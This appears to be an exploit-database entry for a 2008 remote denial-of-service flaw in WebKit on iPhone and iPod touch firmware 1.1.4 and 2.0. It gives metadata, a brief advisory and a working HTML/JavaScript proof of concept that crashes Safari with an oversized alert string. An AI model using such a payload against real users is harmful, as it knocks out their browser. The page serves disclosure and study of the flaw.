header-logo
Suggest Exploit
vendor:
iPhone and iPod touch
by:
SecurityFocus
7.8
CVSS
HIGH
Remote Denial-of-Service
400
CWE
Product Name: iPhone and iPod touch
Affected Version From: iPhone 1.1.4 and 2.0, iPod touch 1.1.4 and 2.0
Affected Version To: iPhone 1.1.4 and 2.0, iPod touch 1.1.4 and 2.0
Patch Exists: YES
Related CWE: N/A
CPE: o:apple:iphone_os
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iOS
2008

Apple iPhone and iPod touch Remote Denial-of-Service Vulnerability

Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser. Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users.

Mitigation:

Users should avoid visiting untrusted websites and should not open suspicious email attachments.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31061/info

Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser.

Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users.

The following devices and corresponding firmware are affected:

iPhone 1.1.4 and 2.0
iPod touch 1.1.4 and 2.0

<html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html>

Navigation

Suggest Exploit

Services By CQR